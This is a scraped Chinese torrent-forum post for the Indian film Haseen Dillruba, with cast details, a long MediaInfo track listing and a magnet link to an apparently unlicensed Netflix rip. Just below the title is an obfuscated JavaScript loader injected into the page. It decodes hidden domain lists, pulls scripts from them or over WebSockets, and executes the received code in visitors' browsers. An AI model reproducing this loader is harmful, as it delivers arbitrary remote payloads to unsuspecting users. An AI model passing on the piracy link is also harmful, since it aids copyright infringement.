Haseen Dillruba[中文字幕].Haseen.Dillruba.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264-Lee-迅雷下载 6.32GB

版主小s 29天前 323

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 Haseen Dillruba

◎年 代 2021

◎产 地 印度

◎类 别 悬疑 / 犯罪

◎语 言 印地语

◎上映日期 2021-07-02(印度)

◎IMDb链接 https://www.imdb.com/title/tt11027830/

◎豆瓣链接 https://movie.douban.com/subject/35200258/

◎演 员 塔丝·潘努 Taapsee Pannu (id:1422435)

维金兰特·马西 Vikrant Massey (id:1406614)

汉西卡·莫瓦妮 Hansika Motwani (id:1214866)

哈什瓦汉·拉纳 Harshvardhan Rane (id:1373086)

◎标 签 悬疑 / 犯罪 / 印度 / 2021 / netflix未看 / netflix原创电影 / M印度

◎简 介

这部惊悚片由塔菩希·潘努、维金兰特·马西和哈什瓦汉·拉纳主演,讲述了一名女子涉嫌谋害亲夫的故事。

  1. General

  2. Unique ID : 51482596927076238665325658951832077395 (0x26BB30003D878B18A47C51330D648453)

  3. Complete name : [email protected]B.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 6.32 GiB

  7. Duration : 2 h 15 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 6 652 kb/s

  10. Encoded date : UTC 2021-07-02 09:06:22

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 3 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 3 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 2 h 15 min

  23. Bit rate mode : Variable

  24. Bit rate : 2 677 kb/s

  25. Nominal bit rate : 3 160 kb/s

  26. Maximum bit rate : 4 740 kb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.054

  37. Stream size : 2.54 GiB (40%)

  38. Writing library : x264 core 148 r2722 1b0121b

  39. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=3160 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=4740 / vbv_bufsize=6320 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 2 h 15 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 747 MiB (12%)

  57. Title : Hindi

  58. Language : Hindi

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : E-AC-3

  69. Format/Info : Enhanced AC-3

  70. Commercial name : Dolby Digital Plus

  71. Codec ID : A_EAC3

  72. Duration : 2 h 15 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Stream size : 622 MiB (10%)

  81. Title : English

  82. Language : English

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : E-AC-3

  89. Format/Info : Enhanced AC-3

  90. Commercial name : Dolby Digital Plus

  91. Codec ID : A_EAC3

  92. Duration : 2 h 15 min

  93. Bit rate mode : Constant

  94. Bit rate : 640 kb/s

  95. Channel(s) : 6 channels

  96. Channel layout : L R C LFE Ls Rs

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Stream size : 622 MiB (10%)

  101. Title : Brazilian Portuguese

  102. Language : Portuguese

  103. Service kind : Complete Main

  104. Default : No

  105. Forced : No


  106. Audio #4

  107. ID : 5

  108. Format : E-AC-3

  109. Format/Info : Enhanced AC-3

  110. Commercial name : Dolby Digital Plus

  111. Codec ID : A_EAC3

  112. Duration : 2 h 15 min

  113. Bit rate mode : Constant

  114. Bit rate : 640 kb/s

  115. Channel(s) : 6 channels

  116. Channel layout : L R C LFE Ls Rs

  117. Sampling rate : 48.0 kHz

  118. Frame rate : 31.250 FPS (1536 SPF)

  119. Compression mode : Lossy

  120. Stream size : 622 MiB (10%)

  121. Title : Spanish

  122. Language : Spanish

  123. Service kind : Complete Main

  124. Default : No

  125. Forced : No


  126. Audio #5

  127. ID : 6

  128. Format : E-AC-3

  129. Format/Info : Enhanced AC-3

  130. Commercial name : Dolby Digital Plus

  131. Codec ID : A_EAC3

  132. Duration : 2 h 15 min

  133. Bit rate mode : Constant

  134. Bit rate : 640 kb/s

  135. Channel(s) : 6 channels

  136. Channel layout : L R C LFE Ls Rs

  137. Sampling rate : 48.0 kHz

  138. Frame rate : 31.250 FPS (1536 SPF)

  139. Compression mode : Lossy

  140. Stream size : 622 MiB (10%)

  141. Title : Tamil

  142. Language : Tamil

  143. Service kind : Complete Main

  144. Default : No

  145. Forced : No


  146. Audio #6

  147. ID : 7

  148. Format : E-AC-3

  149. Format/Info : Enhanced AC-3

  150. Commercial name : Dolby Digital Plus

  151. Codec ID : A_EAC3

  152. Duration : 2 h 15 min

  153. Bit rate mode : Constant

  154. Bit rate : 640 kb/s

  155. Channel(s) : 6 channels

  156. Channel layout : L R C LFE Ls Rs

  157. Sampling rate : 48.0 kHz

  158. Frame rate : 31.250 FPS (1536 SPF)

  159. Compression mode : Lossy

  160. Stream size : 622 MiB (10%)

  161. Title : Telugu

  162. Language : Telugu

  163. Service kind : Complete Main

  164. Default : No

  165. Forced : No


  166. Text #1

  167. ID : 8

  168. Format : UTF-8

  169. Codec ID : S_TEXT/UTF8

  170. Codec ID/Info : UTF-8 Plain Text

  171. Duration : 2 h 7 min

  172. Bit rate : 48 b/s

  173. Count of elements : 1526

  174. Stream size : 45.7 KiB (0%)

  175. Title : English

  176. Language : English

  177. Default : No

  178. Forced : No


  179. Text #2

  180. ID : 9

  181. Format : UTF-8

  182. Codec ID : S_TEXT/UTF8

  183. Codec ID/Info : UTF-8 Plain Text

  184. Duration : 2 h 15 min

  185. Bit rate : 69 b/s

  186. Count of elements : 1537

  187. Stream size : 69.0 KiB (0%)

  188. Title : Arabic

  189. Language : Arabic

  190. Default : No

  191. Forced : No


  192. Text #3

  193. ID : 10

  194. Format : UTF-8

  195. Codec ID : S_TEXT/UTF8

  196. Codec ID/Info : UTF-8 Plain Text

  197. Duration : 2 h 15 min

  198. Bit rate : 45 b/s

  199. Count of elements : 1540

  200. Stream size : 44.7 KiB (0%)

  201. Title : Chinese Simplified

  202. Language : Chinese

  203. Default : No

  204. Forced : No


  205. Text #4

  206. ID : 11

  207. Format : UTF-8

  208. Codec ID : S_TEXT/UTF8

  209. Codec ID/Info : UTF-8 Plain Text

  210. Duration : 2 h 15 min

  211. Bit rate : 46 b/s

  212. Count of elements : 1541

  213. Stream size : 45.6 KiB (0%)

  214. Title : Chinese Traditional

  215. Language : Chinese

  216. Default : No

  217. Forced : No


  218. Text #5

  219. ID : 12

  220. Format : UTF-8

  221. Codec ID : S_TEXT/UTF8

  222. Codec ID/Info : UTF-8 Plain Text

  223. Duration : 2 h 15 min

  224. Bit rate : 40 b/s

  225. Count of elements : 1529

  226. Stream size : 39.8 KiB (0%)

  227. Title : Croatian

  228. Language : Croatian

  229. Default : No

  230. Forced : No


  231. Text #6

  232. ID : 13

  233. Format : UTF-8

  234. Codec ID : S_TEXT/UTF8

  235. Codec ID/Info : UTF-8 Plain Text

  236. Duration : 2 h 15 min

  237. Bit rate : 42 b/s

  238. Count of elements : 1534

  239. Stream size : 42.2 KiB (0%)

  240. Title : Czech

  241. Language : Czech

  242. Default : No

  243. Forced : No


  244. Text #7

  245. ID : 14

  246. Format : UTF-8

  247. Codec ID : S_TEXT/UTF8

  248. Codec ID/Info : UTF-8 Plain Text

  249. Duration : 2 h 15 min

  250. Bit rate : 44 b/s

  251. Count of elements : 1535

  252. Stream size : 44.4 KiB (0%)

  253. Title : Danish

  254. Language : Danish

  255. Default : No

  256. Forced : No


  257. Text #8

  258. ID : 15

  259. Format : UTF-8

  260. Codec ID : S_TEXT/UTF8

  261. Codec ID/Info : UTF-8 Plain Text

  262. Duration : 2 h 15 min

  263. Bit rate : 42 b/s

  264. Count of elements : 1518

  265. Stream size : 42.1 KiB (0%)

  266. Title : Dutch

  267. Language : Dutch

  268. Default : No

  269. Forced : No


  270. Text #9

  271. ID : 16

  272. Format : UTF-8

  273. Codec ID : S_TEXT/UTF8

  274. Codec ID/Info : UTF-8 Plain Text

  275. Duration : 2 h 15 min

  276. Bit rate : 44 b/s

  277. Count of elements : 1534

  278. Stream size : 44.2 KiB (0%)

  279. Title : Finnish

  280. Language : Finnish

  281. Default : No

  282. Forced : No


  283. Text #10

  284. ID : 17

  285. Format : UTF-8

  286. Codec ID : S_TEXT/UTF8

  287. Codec ID/Info : UTF-8 Plain Text

  288. Duration : 2 h 15 min

  289. Bit rate : 45 b/s

  290. Count of elements : 1527

  291. Stream size : 45.1 KiB (0%)

  292. Title : French

  293. Language : French

  294. Default : No

  295. Forced : No


  296. Text #11

  297. ID : 18

  298. Format : UTF-8

  299. Codec ID : S_TEXT/UTF8

  300. Codec ID/Info : UTF-8 Plain Text

  301. Duration : 2 h 15 min

  302. Bit rate : 44 b/s

  303. Count of elements : 1535

  304. Stream size : 44.2 KiB (0%)

  305. Title : German

  306. Language : German

  307. Default : No

  308. Forced : No


  309. Text #12

  310. ID : 19

  311. Format : UTF-8

  312. Codec ID : S_TEXT/UTF8

  313. Codec ID/Info : UTF-8 Plain Text

  314. Duration : 2 h 15 min

  315. Bit rate : 72 b/s

  316. Count of elements : 1534

  317. Stream size : 71.7 KiB (0%)

  318. Title : Greek

  319. Language : Greek

  320. Default : No

  321. Forced : No


  322. Text #13

  323. ID : 20

  324. Format : UTF-8

  325. Codec ID : S_TEXT/UTF8

  326. Codec ID/Info : UTF-8 Plain Text

  327. Duration : 2 h 15 min

  328. Bit rate : 64 b/s

  329. Count of elements : 1534

  330. Stream size : 64.0 KiB (0%)

  331. Title : Hebrew

  332. Language : Hebrew

  333. Default : No

  334. Forced : No


  335. Text #14

  336. ID : 21

  337. Format : UTF-8

  338. Codec ID : S_TEXT/UTF8

  339. Codec ID/Info : UTF-8 Plain Text

  340. Duration : 2 h 15 min

  341. Bit rate : 140 b/s

  342. Count of elements : 1877

  343. Stream size : 139 KiB (0%)

  344. Title : Hindi

  345. Language : Hindi

  346. Default : No

  347. Forced : No


  348. Text #15

  349. ID : 22

  350. Format : UTF-8

  351. Codec ID : S_TEXT/UTF8

  352. Codec ID/Info : UTF-8 Plain Text

  353. Duration : 33 min 56 s

  354. Bit rate : 2 b/s

  355. Count of elements : 20

  356. Stream size : 530 Bytes (0%)

  357. Title : Hindi (Forced)

  358. Language : Hindi

  359. Default : No

  360. Forced : Yes


  361. Text #16

  362. ID : 23

  363. Format : UTF-8

  364. Codec ID : S_TEXT/UTF8

  365. Codec ID/Info : UTF-8 Plain Text

  366. Duration : 2 h 15 min

  367. Bit rate : 42 b/s

  368. Count of elements : 1532

  369. Stream size : 42.0 KiB (0%)

  370. Title : Hungarian

  371. Language : Hungarian

  372. Default : No

  373. Forced : No


  374. Text #17

  375. ID : 24

  376. Format : UTF-8

  377. Codec ID : S_TEXT/UTF8

  378. Codec ID/Info : UTF-8 Plain Text

  379. Duration : 2 h 15 min

  380. Bit rate : 46 b/s

  381. Count of elements : 1536

  382. Stream size : 45.5 KiB (0%)

  383. Title : Indonesian

  384. Language : Indonesian

  385. Default : No

  386. Forced : No


  387. Text #18

  388. ID : 25

  389. Format : UTF-8

  390. Codec ID : S_TEXT/UTF8

  391. Codec ID/Info : UTF-8 Plain Text

  392. Duration : 2 h 15 min

  393. Bit rate : 43 b/s

  394. Count of elements : 1530

  395. Stream size : 42.8 KiB (0%)

  396. Title : Italian

  397. Language : Italian

  398. Default : No

  399. Forced : No


  400. Text #19

  401. ID : 26

  402. Format : UTF-8

  403. Codec ID : S_TEXT/UTF8

  404. Codec ID/Info : UTF-8 Plain Text

  405. Duration : 2 h 15 min

  406. Bit rate : 43 b/s

  407. Count of elements : 1474

  408. Stream size : 43.0 KiB (0%)

  409. Title : Japanese

  410. Language : Japanese

  411. Default : No

  412. Forced : No


  413. Text #20

  414. ID : 27

  415. Format : UTF-8

  416. Codec ID : S_TEXT/UTF8

  417. Codec ID/Info : UTF-8 Plain Text

  418. Duration : 2 h 15 min

  419. Bit rate : 54 b/s

  420. Count of elements : 1421

  421. Stream size : 54.1 KiB (0%)

  422. Title : Korean

  423. Language : Korean

  424. Default : No

  425. Forced : No


  426. Text #21

  427. ID : 28

  428. Format : UTF-8

  429. Codec ID : S_TEXT/UTF8

  430. Codec ID/Info : UTF-8 Plain Text

  431. Duration : 2 h 15 min

  432. Bit rate : 46 b/s

  433. Count of elements : 1534

  434. Stream size : 46.3 KiB (0%)

  435. Title : Malay

  436. Language : Malay

  437. Default : No

  438. Forced : No


  439. Text #22

  440. ID : 29

  441. Format : UTF-8

  442. Codec ID : S_TEXT/UTF8

  443. Codec ID/Info : UTF-8 Plain Text

  444. Duration : 2 h 15 min

  445. Bit rate : 43 b/s

  446. Count of elements : 1534

  447. Stream size : 43.4 KiB (0%)

  448. Title : Norwegian Bokmal

  449. Language : Norwegian Bokmal

  450. Default : No

  451. Forced : No


  452. Text #23

  453. ID : 30

  454. Format : UTF-8

  455. Codec ID : S_TEXT/UTF8

  456. Codec ID/Info : UTF-8 Plain Text

  457. Duration : 2 h 15 min

  458. Bit rate : 41 b/s

  459. Count of elements : 1526

  460. Stream size : 41.5 KiB (0%)

  461. Title : Polish

  462. Language : Polish

  463. Default : No

  464. Forced : No


  465. Text #24

  466. ID : 31

  467. Format : UTF-8

  468. Codec ID : S_TEXT/UTF8

  469. Codec ID/Info : UTF-8 Plain Text

  470. Duration : 2 h 15 min

  471. Bit rate : 43 b/s

  472. Count of elements : 1525

  473. Stream size : 43.4 KiB (0%)

  474. Title : Portuguese

  475. Language : Portuguese

  476. Default : No

  477. Forced : No


  478. Text #25

  479. ID : 32

  480. Format : UTF-8

  481. Codec ID : S_TEXT/UTF8

  482. Codec ID/Info : UTF-8 Plain Text

  483. Duration : 2 h 15 min

  484. Bit rate : 43 b/s

  485. Count of elements : 1516

  486. Stream size : 43.2 KiB (0%)

  487. Title : Brazilian Portuguese

  488. Language : Portuguese

  489. Default : No

  490. Forced : No


  491. Text #26

  492. ID : 33

  493. Format : UTF-8

  494. Codec ID : S_TEXT/UTF8

  495. Codec ID/Info : UTF-8 Plain Text

  496. Duration : 2 h 15 min

  497. Bit rate : 47 b/s

  498. Count of elements : 1531

  499. Stream size : 47.4 KiB (0%)

  500. Title : Romanian

  501. Language : Romanian

  502. Default : No

  503. Forced : No


  504. Text #27

  505. ID : 34

  506. Format : UTF-8

  507. Codec ID : S_TEXT/UTF8

  508. Codec ID/Info : UTF-8 Plain Text

  509. Duration : 2 h 15 min

  510. Bit rate : 73 b/s

  511. Count of elements : 1538

  512. Stream size : 72.3 KiB (0%)

  513. Title : Russian

  514. Language : Russian

  515. Default : No

  516. Forced : No


  517. Text #28

  518. ID : 35

  519. Format : UTF-8

  520. Codec ID : S_TEXT/UTF8

  521. Codec ID/Info : UTF-8 Plain Text

  522. Duration : 2 h 15 min

  523. Bit rate : 45 b/s

  524. Count of elements : 1522

  525. Stream size : 45.5 KiB (0%)

  526. Title : Spanish

  527. Language : Spanish

  528. Default : No

  529. Forced : No


  530. Text #29

  531. ID : 36

  532. Format : UTF-8

  533. Codec ID : S_TEXT/UTF8

  534. Codec ID/Info : UTF-8 Plain Text

  535. Duration : 2 h 15 min

  536. Bit rate : 41 b/s

  537. Count of elements : 1533

  538. Stream size : 41.0 KiB (0%)

  539. Title : European Spanish

  540. Language : Spanish

  541. Default : No

  542. Forced : No


  543. Text #30

  544. ID : 37

  545. Format : UTF-8

  546. Codec ID : S_TEXT/UTF8

  547. Codec ID/Info : UTF-8 Plain Text

  548. Duration : 2 h 15 min

  549. Bit rate : 42 b/s

  550. Count of elements : 1533

  551. Stream size : 41.6 KiB (0%)

  552. Title : Swedish

  553. Language : Swedish

  554. Default : No

  555. Forced : No


  556. Text #31

  557. ID : 38

  558. Format : UTF-8

  559. Codec ID : S_TEXT/UTF8

  560. Codec ID/Info : UTF-8 Plain Text

  561. Duration : 2 h 15 min

  562. Bit rate : 99 b/s

  563. Count of elements : 1537

  564. Stream size : 98.8 KiB (0%)

  565. Title : Thai

  566. Language : Thai

  567. Default : No

  568. Forced : No


  569. Text #32

  570. ID : 39

  571. Format : UTF-8

  572. Codec ID : S_TEXT/UTF8

  573. Codec ID/Info : UTF-8 Plain Text

  574. Duration : 2 h 15 min

  575. Bit rate : 45 b/s

  576. Count of elements : 1531

  577. Stream size : 44.6 KiB (0%)

  578. Title : Turkish

  579. Language : Turkish

  580. Default : Yes

  581. Forced : No


  582. Text #33

  583. ID : 40

  584. Format : UTF-8

  585. Codec ID : S_TEXT/UTF8

  586. Codec ID/Info : UTF-8 Plain Text

  587. Duration : 2 h 15 min

  588. Bit rate : 66 b/s

  589. Count of elements : 1537

  590. Stream size : 65.5 KiB (0%)

  591. Title : Ukrainian

  592. Language : Ukrainian

  593. Default : No

  594. Forced : No


  595. Text #34

  596. ID : 41

  597. Format : UTF-8

  598. Codec ID : S_TEXT/UTF8

  599. Codec ID/Info : UTF-8 Plain Text

  600. Duration : 2 h 15 min

  601. Bit rate : 63 b/s

  602. Count of elements : 1524

  603. Stream size : 63.1 KiB (0%)

  604. Title : Vietnamese

  605. Language : Vietnamese

  606. Default : No

  607. Forced : No


TAGS 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:CB89720D75674118433851CDAC44BA4A9C16FD78
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回